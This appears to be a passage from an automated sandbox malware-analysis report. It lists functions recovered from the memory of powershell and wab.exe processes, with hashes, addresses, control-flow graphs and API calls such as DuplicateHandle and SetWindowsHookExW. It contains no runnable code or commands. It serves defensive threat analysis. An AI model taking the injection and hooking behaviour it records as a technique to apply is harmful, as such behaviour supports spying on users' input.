                                                                            • Instruction Fuzzy Hash: 5D01E474E0064A8FCB81DFA9D585AAEBFF0FF89210F5041D9D909DB322E731A951CB91
                                                                            Function 04BE8828 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 33c4e56706fec34785e3d2192a7d5a6d1c07dabeaee151c8c370c64b661d35ec
                                                                            • Instruction ID: df275e0f30c27412c26f3f960b0f65798826d7515227b6f0d6809b7d4609b031
                                                                            • Opcode Fuzzy Hash: 33c4e56706fec34785e3d2192a7d5a6d1c07dabeaee151c8c370c64b661d35ec
                                                                            • Instruction Fuzzy Hash: 9FF0C230B003146BDB04AA19C494B9EBBE7EB88320F04403CE905BB390DFB26C4087A5
                                                                            Function 04BE8410 Relevance: .0, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bab5a43c84de80c0c7f2c332ac5174178d02ba86775fe00e556b2c34d329c02
                                                                            • Instruction ID: 388f5ab7d01d95e84cd7c38fb8cc4f8b7232051762c302d793949f2e016a8978
                                                                            • Opcode Fuzzy Hash: 9bab5a43c84de80c0c7f2c332ac5174178d02ba86775fe00e556b2c34d329c02
                                                                            • Instruction Fuzzy Hash: 9DF0E9302053408FC715DB19C544E65BBB4EFC6759B1980EED4488F262C775EC49C760
                                                                            Function 04BE2D5E Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 807a089bfae9ca2e9381121d96653a3e2bb155da3a1148e5469ab8f7a85010ce
                                                                            • Instruction ID: f4a03b49e0356a6c12ac468f43e91ae23eb44a1a7f47956ca1b3a8893d7739c4
                                                                            • Opcode Fuzzy Hash: 807a089bfae9ca2e9381121d96653a3e2bb155da3a1148e5469ab8f7a85010ce
                                                                            • Instruction Fuzzy Hash: AAF0DA35A001059FDB15CF9DD890AEEF7B5FF88324F248199E515A72A1C736EC52CB50
                                                                            Function 04BE8218 Relevance: .0, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a769b9452573ce6e45ab5951d887946b7cd780118f009882557b27298787ab3
                                                                            • Instruction ID: 43338adbd8f89e48247c585bcc9c22e175f1bf6266c71382188381ffe4ffd8ce
                                                                            • Opcode Fuzzy Hash: 9a769b9452573ce6e45ab5951d887946b7cd780118f009882557b27298787ab3
                                                                            • Instruction Fuzzy Hash: E6F0A974E0020A8FCB80DFA8D485AAEBBF0FF49214F504199D909DB325E730A941CBD1
                                                                            Function 04BEA458 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76aaa48c057911584b43dbaf03991e8212cecf7c7c0ce21e1ed6a43165b3aca2
                                                                            • Instruction ID: f3a43cfd847ef16d05cf1f774cb99a42bc2a7c6a9d78e4affb190206c4e02405
                                                                            • Opcode Fuzzy Hash: 76aaa48c057911584b43dbaf03991e8212cecf7c7c0ce21e1ed6a43165b3aca2
                                                                            • Instruction Fuzzy Hash: 85E092317003005FD709EB68E494AAD77A6EFC6754B064655E602CF395CF78AC828791
                                                                            Function 04BE83D0 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f90ce118aa8b3aa115c61f6a3b04592e6b9c67a110c144769b3937316fc21793
                                                                            • Instruction ID: 797527b8980c1e5c00aa1fb7954df98b6221782b0c1919b9789e50d079eb9895
                                                                            • Opcode Fuzzy Hash: f90ce118aa8b3aa115c61f6a3b04592e6b9c67a110c144769b3937316fc21793
                                                                            • Instruction Fuzzy Hash: 8FE04F302462408FD7069B14E558A707F74EB82255B2540EAD18DCF173C7329846CB61
                                                                            Function 07866208 Relevance: .0, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1955701819.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7860000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d033979352a5eee67cec6f11ada2f8d2f88fea72b2565f02d3dc89f256ab5b55
                                                                            • Instruction ID: 86b44243f54f542ad1fe8dc23c37d6b2942188e6d7c8a2ec7d4f2c8de98fee0f
                                                                            • Opcode Fuzzy Hash: d033979352a5eee67cec6f11ada2f8d2f88fea72b2565f02d3dc89f256ab5b55
                                                                            • Instruction Fuzzy Hash: 69D05EB2700145FBEB54DE48E59A920F792BFBA208B15809891168F386DA319842C742

                                                                            Execution Graph

                                                                            Execution Coverage:5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:5
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 18801 22557378 DuplicateHandle 18802 2255740e 18801->18802 18803 22552208 18804 2255224c SetWindowsHookExW 18803->18804 18806 22552292 18804->18806

                                                                            Executed Functions

                                                                            Function 24F66230 Relevance: .4, Instructions: 366COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 421 24f66230-24f66247 422 24f66250-24f66256 421->422 423 24f66249-24f6624e 421->423 424 24f66259-24f6625d 422->424 423->424 425 24f66266-24f6626c 424->425 426 24f6625f-24f66264 424->426 427 24f6626f-24f66273 425->427 426->427 428 24f66297-24f6629b 427->428 429 24f66275-24f66292 427->429 430 24f662bf-24f662ca 428->430 431 24f6629d-24f662ba 428->431 440 24f664b7-24f664c0 429->440 433 24f662d2-24f662d8 430->433 434 24f662cc-24f662cf 430->434 431->440 435 24f664c3-24f66766 433->435 436 24f662de-24f662ee 433->436 434->433 443 24f66313-24f66338 436->443 444 24f662f0-24f6630e 436->444 451 24f66480-24f66485 443->451 452 24f6633e-24f66347 443->452 448 24f66477-24f6647a 444->448 448->451 448->452 451->435 454 24f66487-24f6648a 451->454 452->435 455 24f6634d-24f66365 452->455 457 24f6648e-24f66491 454->457 458 24f6648c 454->458 462 24f66377-24f6638e 455->462 463 24f66367-24f6636c 455->463 457->435 459 24f66493-24f664a1 457->459 458->440 469 24f664a9-24f664b5 459->469 471 24f66396-24f663a0 462->471 472 24f66390 462->472 463->435 465 24f66372-24f66375 463->465 465->462 467 24f663a5-24f663aa 465->467 467->435 473 24f663b0-24f663bf 467->473 469->440 471->451 472->471 478 24f663c7-24f663d7 473->478 479 24f663c1 473->479 478->435 482 24f663dd-24f663e0 478->482 479->478 482->435 484 24f663e6-24f663e9 482->484 485 24f6643a-24f6644c 484->485 486 24f663eb-24f663ef 484->486 485->448 493 24f6644e-24f66463 485->493 486->435 488 24f663f5-24f663fb 486->488 491 24f6640c-24f66412 488->491 492 24f663fd-24f66403 488->492 491->435 495 24f66418-24f66438 491->495 492->435 494 24f66409 492->494 500 24f66465 493->500 501 24f6646b-24f66475 493->501 494->491 495->485 500->501 501->451
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2688727430.0000000024F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24F60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_24f60000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 88d8b071d4d2feab30da38fed90d04564a04c7f544d0c55eeacc9f76d7d4fff7
                                                                            • Instruction ID: 4cb7d504c4b4fbc97f62dd0a4fd9f7102beec7fcb8742e8ce8cf54afe627d861
                                                                            • Opcode Fuzzy Hash: 88d8b071d4d2feab30da38fed90d04564a04c7f544d0c55eeacc9f76d7d4fff7
                                                                            • Instruction Fuzzy Hash: 2FE13F34B00208DFEB05EBA8C454BAEBBB3FFC8B11F108055E816A7355DB39AD569B51
                                                                            Function 22557371 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 29 22557371-2255740c DuplicateHandle 30 22557415-22557432 29->30 31 2255740e-22557414 29->31 31->30
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 225573FF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2686128314.0000000022550000.00000040.00000800.00020000.00000000.sdmp, Offset: 22550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_22550000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 36eb681550d0b17f5d7f6007e7dd9e646f69777e557b16b74a377a36a359e31f
                                                                            • Instruction ID: 9f95c02913e8e744a61d7f0f5951b215e5fd8b16d47d01d6920b900a7d6d0461
                                                                            • Opcode Fuzzy Hash: 36eb681550d0b17f5d7f6007e7dd9e646f69777e557b16b74a377a36a359e31f
                                                                            • Instruction Fuzzy Hash: 342100B59002489FDB10CFAAD980ADEFFF4EB48320F10841AE918A7250C378A950CFA1
                                                                            Function 22557378 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 34 22557378-2255740c DuplicateHandle 35 22557415-22557432 34->35 36 2255740e-22557414 34->36 36->35
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 225573FF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2686128314.0000000022550000.00000040.00000800.00020000.00000000.sdmp, Offset: 22550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_22550000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 9ef41b9bebac301d74cdfa513a455d086b05365da2ddec4e5b71e1659b21c7d4
                                                                            • Instruction ID: c5730c36df557008a4f740f499b8df029028a99742435a8d0e05c740c79744f4
                                                                            • Opcode Fuzzy Hash: 9ef41b9bebac301d74cdfa513a455d086b05365da2ddec4e5b71e1659b21c7d4
                                                                            • Instruction Fuzzy Hash: 3021E3B59002499FDB10CFAAD984ADEBFF4EB48310F10841AE914A7250D378A950CF61
                                                                            Function 22552200 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 39 22552200-22552252 41 22552254 39->41 42 2255225e-22552290 SetWindowsHookExW 39->42 45 2255225c 41->45 43 22552292-22552298 42->43 44 22552299-225522be 42->44 43->44 45->42
                                                                            APIs
                                                                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 22552283
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2686128314.0000000022550000.00000040.00000800.00020000.00000000.sdmp, Offset: 22550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_22550000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: 9d107fd46333e2d4543d0f7837aa667a5675c530416f641ca156412c9f750770
                                                                            • Instruction ID: 1e2126606ca3eb9785928b5059d8944f3e53487c7faab63d49354b3792684c76
                                                                            • Opcode Fuzzy Hash: 9d107fd46333e2d4543d0f7837aa667a5675c530416f641ca156412c9f750770
                                                                            • Instruction Fuzzy Hash: 0E2118B5D002498FDB14DFA9D944BEEBBF5BF88310F10841AD459A7250C775A941CFA1
                                                                            Function 22552208 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 49 22552208-22552252 51 22552254 49->51 52 2255225e-22552290 SetWindowsHookExW 49->52 55 2255225c 51->55 53 22552292-22552298 52->53 54 22552299-225522be 52->54 53->54 55->52
                                                                            APIs
                                                                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 22552283
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2686128314.0000000022550000.00000040.00000800.00020000.00000000.sdmp, Offset: 22550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_22550000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: 64b36675f43546723de4fe50be3f8b5e901eb5d5309b6278154c4e04068713b3
                                                                            • Instruction ID: 696e523fd4eb16da39a5a758208d54f8920c7d971192d23c06acc8ae47b5dbeb
                                                                            • Opcode Fuzzy Hash: 64b36675f43546723de4fe50be3f8b5e901eb5d5309b6278154c4e04068713b3
                                                                            • Instruction Fuzzy Hash: BC21F7B5D002099FDB14DFAAD944BDEFBF5BF88310F10842AD459A7250CBB5A944CFA1
                                                                            Function 00C8D500 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2661205584.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_c8d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7bb14fd6c6a3d2ed42ec68c0deb00465b2209e6e36028d1e7cf1522d8f73dab0
                                                                            • Instruction ID: 47ea494d632df66d1877463c85f0f4be93d34792d4bacd55807c31d4e2a14dbe
                                                                            • Opcode Fuzzy Hash: 7bb14fd6c6a3d2ed42ec68c0deb00465b2209e6e36028d1e7cf1522d8f73dab0
                                                                            • Instruction Fuzzy Hash: 542106B1504304DFDB05EF14D9C0B26BF61FB98328F20C56AD80A0A286C336D956CBA2
                                                                            Function 00C9D0FC Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2661345217.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_c9d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9d9834931494934fb9ca44c2938a9d6112cadaf0f66ccd628e554c39b605f577
                                                                            • Instruction ID: 11f9f076baecc9a6d5d8eca047183a830188ac9e38fb2e8f3ecc4aa374403233
                                                                            • Opcode Fuzzy Hash: 9d9834931494934fb9ca44c2938a9d6112cadaf0f66ccd628e554c39b605f577
                                                                            • Instruction Fuzzy Hash: 02210776604304DFDF04DF10D9C8B2ABBA1FB84724F20C56DD80A5B256C37AD846CB61
                                                                            Function 24F66168 Relevance: .1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2688727430.0000000024F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24F60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_24f60000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65da1a34d1db2f2bf80a68a4a9d0dda78f57f8a92d1777e5d165b52606568cbc
                                                                            • Instruction ID: 9797deb819ebb6975a19294bdbed2fcec525056e32233117a353e7b98ffcf125
                                                                            • Opcode Fuzzy Hash: 65da1a34d1db2f2bf80a68a4a9d0dda78f57f8a92d1777e5d165b52606568cbc
                                                                            • Instruction Fuzzy Hash: 5011B931F001145BEB149A799C157AE77A3FBC4F10F108629E927D7396DA3089039B90
                                                                            Function 00C8D4FB Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2661205584.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_c8d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9608e99869a3ea36420784c31bc91d36e9dbf26f6d733506b74b974621167111
                                                                            • Instruction ID: 2c4b6d52c1baa7a9f512f709f0f325849f8effee3f9788cbd617f7a88bb0bc3d
                                                                            • Opcode Fuzzy Hash: 9608e99869a3ea36420784c31bc91d36e9dbf26f6d733506b74b974621167111
                                                                            • Instruction Fuzzy Hash: BC1103B6504244DFCB11DF10D5C0B16BF72FB84328F24C5AADC4A4B256C33AD956CBA2
                                                                            Function 00C9D0F7 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2661345217.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_c9d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0be0911e4ec380e38d32cc199c2f052513f6584ca277e8337b0e0836e339b5e0
                                                                            • Instruction ID: cfc1a40be9d27811c95fb4584078a1099994e451fc6d42a692f081d9da27dcb3
                                                                            • Opcode Fuzzy Hash: 0be0911e4ec380e38d32cc199c2f052513f6584ca277e8337b0e0836e339b5e0
                                                                            • Instruction Fuzzy Hash: 2D11D076504244CFDF05CF10D9C4B19BBA1FB84324F24C6ADD84A4B256C33AD94ACB51